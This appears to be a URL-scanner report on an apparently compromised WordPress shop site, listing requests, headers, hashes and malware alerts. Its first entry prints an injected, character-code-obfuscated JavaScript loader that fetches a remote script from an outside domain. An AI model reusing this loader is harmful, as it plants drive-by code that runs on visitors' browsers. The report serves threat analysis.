/widgets.js
104.22.54.216404 Not Found 764 B URL HTTP/1.1 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 104.22.54.216:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2986)
Hash e0b278a03f3c0916a366ea6e39a232c7
c383e5fa69a1cf6016560cb0aa9f17be5b699bea
22d617e43c0296250a3e4b524c3672329157563a5b5f065f4f7d0e8b5ea78e40
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 404 Not Found
Date: Sat, 03 Dec 2022 15:04:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zotabox
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Encoding: gzip
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 773d31effdddb500-OSL
translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
216.58.211.14200 OK 27 kB URL HTTP/2 translate.google.com/translate_a/element.js?cb=googleTranslateElementInit
IP 216.58.211.14:0
Hash 5c67eb04d4ca4f627d7d2780ffad8d3d
64823de7d653fba274f65032493d1e3b59c20db2
333f4e41978fc65b7cffd2715322ef63404b6d07f3fe3905a4350612a6edec7a
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1
Host: translate.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://uniqlonhat.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/javascript; charset=utf-8
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Sat, 03 Dec 2022 15:04:29 GMT
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
set-cookie: CONSENT=PENDING+281; expires=Mon, 02-Dec-2024 15:04:29 GMT; path=/; domain=.google.com; Secure
p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
uniqlonhat.com/wp-content/themes/eStore/js/jquery.cycle.all.min.js
103.28.36.212200 OK 8.1 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/js/jquery.cycle.all.min.js
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (16491)
Hash d14a46d8c319a2afa2baa25c6659e2d2
c1403b746039d5ba9f304ad4483399771a424dc4
0108865b982cfc9b9e6f51572e0bd7f8e00af97ba1a7da56aa1acf704205bb9b
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/eStore/js/jquery.cycle.all.min.js HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Thu, 26 Mar 2020 03:49:49 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 8051
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/plugins/dw-question-answer/templates/assets/css/style.css?ver=180720161357
103.28.36.212200 OK 2.7 kB URL HTTP/1.1 uniqlonhat.com/wp-content/plugins/dw-question-answer/templates/assets/css/style.css?ver=180720161357
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
Hash 3a2089cfd0273892ac6c1009ddde7d2c
60085b0fe5a52b4e85703cd592698cdf57bc8108
28238f991a28593c38e501b6c43e41895cbeeb1ce1073a0ada60cb5312e9e6ec
GET /wp-content/plugins/dw-question-answer/templates/assets/css/style.css?ver=180720161357 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: text/css
Last-Modified: Thu, 26 Mar 2020 03:47:47 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 2712
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/plugins/dw-question-answer/templates/assets/css/rtl.css?ver=180720161357
103.28.36.212200 OK 344 B URL HTTP/1.1 uniqlonhat.com/wp-content/plugins/dw-question-answer/templates/assets/css/rtl.css?ver=180720161357
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
Hash 3f09b771f948de8f7eafce18ed46b8ea
af324857c70fc29ddf0985d126e956838e8f7a27
44df8f8c8a6bc04a503f187091e4469f76438425a1ae66755c864360204d698e
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/dw-question-answer/templates/assets/css/rtl.css?ver=180720161357 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: text/css
Last-Modified: Thu, 26 Mar 2020 03:47:48 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 344
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/plugins/wp-phonering/css/style.css?ver=5.6.10
103.28.36.212200 OK 2.7 kB URL HTTP/1.1 uniqlonhat.com/wp-content/plugins/wp-phonering/css/style.css?ver=5.6.10
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (1358)
Hash 5ef6cc3ba0b90868ccd497842e55edd7
3e07b45239ebc0477c08a4f94cca83f67738a9ee
27cbaa25f65b5b0f9204a11906ff663748de98668fd2aaba64e7923e426de261
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/wp-phonering/css/style.css?ver=5.6.10 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: text/css
Last-Modified: Thu, 26 Mar 2020 03:49:34 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 2727
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/epanel/shortcodes/css/shortcodes.css?ver=3.0
103.28.36.212200 OK 7.3 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/epanel/shortcodes/css/shortcodes.css?ver=3.0
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (859)
Hash 12da1bbffa595031398a1486f4be7611
4924e77a3155335bebff596f50e024fc69f88f28
dcbddce98e2009d97d1695cf8a908c3b4716e0212032c1253b7d780f8e517060
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/eStore/epanel/shortcodes/css/shortcodes.css?ver=3.0 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: text/css
Last-Modified: Thu, 26 Mar 2020 03:49:43 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 7335
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.css?ver=1.3.4
103.28.36.212200 OK 1.6 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.css?ver=1.3.4
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
Hash dd6245a156506658e7f9e933221de7cc
04b7402660bf0842c244f87d34e01f8da2b01179
97bf1ce37d4e45b87e585c04e30b9d4be9541ff47bea757b0064a97a39ec477b
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/eStore/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.css?ver=1.3.4 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: text/css
Last-Modified: Thu, 26 Mar 2020 03:49:41 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 1554
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/page_templates.css?ver=1.8
103.28.36.212200 OK 2.5 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/page_templates.css?ver=1.8
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
Hash dc0f11897db6a53f5dabb303ad8bff25
28eae9025c9f0c4709622ef945f20c2627deee8c
7266309e9fdaa4e8458cd924a5db8b4f49feeb17fc4a2483cfe64dabc7fa56b5
GET /wp-content/themes/eStore/epanel/page_templates/page_templates.css?ver=1.8 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: text/css
Last-Modified: Thu, 26 Mar 2020 03:49:41 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 2523
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
103.28.36.212200 OK 4.5 kB URL HTTP/1.1 uniqlonhat.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (11126)
Hash b58921fb05a6cd3dcd6a9e5dc711d101
c147159c1a060cf4d4efb5f9e1fd5622f602c372
a2060d15016d5ea84f62e0404eb7a6e8d22177f5d26a8c2b9130146715986d5e
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Wed, 13 Jan 2021 15:27:45 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 4461
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/style-Red.css
103.28.36.212200 OK 484 B URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/style-Red.css
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
Hash bc55536c8f2388b4094849beacda1c17
3162db0b99dabbffd9ea8d259ffe6ed3536b68ac
e25e25abc8b249cecbf5ba87c6d6027c6c10f6a00f794009627ed3cd5969cdb9
GET /wp-content/themes/eStore/style-Red.css HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: text/css
Last-Modified: Thu, 26 Mar 2020 03:49:51 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 484
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=1610547006
103.28.36.212200 OK 10 kB URL HTTP/1.1 uniqlonhat.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=1610547006
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type Unicode text, UTF-8 text, with very long lines (56811), with no line terminators
Hash 91c30d5ecc47a9bb1bb8174be42b002d
ec642d28359e1ce0c0e3642074a6b41c0963a862
58552d84b20f30e70cb2dfc542a3967b8680556658c955500b8330e5661a2305
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/gutenberg/build/block-library/style.css?ver=1610547006 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: text/css
Last-Modified: Wed, 13 Jan 2021 14:10:06 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 10480
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/js/jquery.easing.1.3.js
103.28.36.212200 OK 2.2 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/js/jquery.easing.1.3.js
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
Hash 8753772e11cffda840689f979da53b17
ca347ce5309e5153b0bd36c4287fdbe8a2b0fa64
df5b8bb3332ec8004cc9e687b480c9b81320aa9a00d66855135904a013b4d080
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/eStore/js/jquery.easing.1.3.js HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Thu, 26 Mar 2020 03:49:49 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 2171
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/js/superfish.js
103.28.36.212200 OK 1.6 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/js/superfish.js
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
Hash 1ef912dc3a2599d57c9daaa974637028
2c7b6ed5feab950deb51b085cdcff6f357bdaf22
9866b5e5460a30262201747501bfae1ecc8bc140a6e5721e059b10b908953a94
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/eStore/js/superfish.js HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Thu, 26 Mar 2020 03:49:49 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 1592
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
103.28.36.212200 OK 35 kB URL HTTP/1.1 uniqlonhat.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (65451)
Hash 2227048e6706845fb5eab0c5c9782159
c4ddc20b406660d5a19cf9102f571f6f557c1311
561f01360fb156d611da7d1826193bb864644ab4d86e52a891719743078bc785
GET /wp-includes/js/jquery/jquery.min.js?ver=3.5.1 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Wed, 13 Jan 2021 15:27:45 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 34817
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
i.imgur.com/v8TniL3.png
151.101.84.193301 Moved Permanently 0 B IP 151.101.84.193:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /v8TniL3.png HTTP/1.1
Host: i.imgur.com
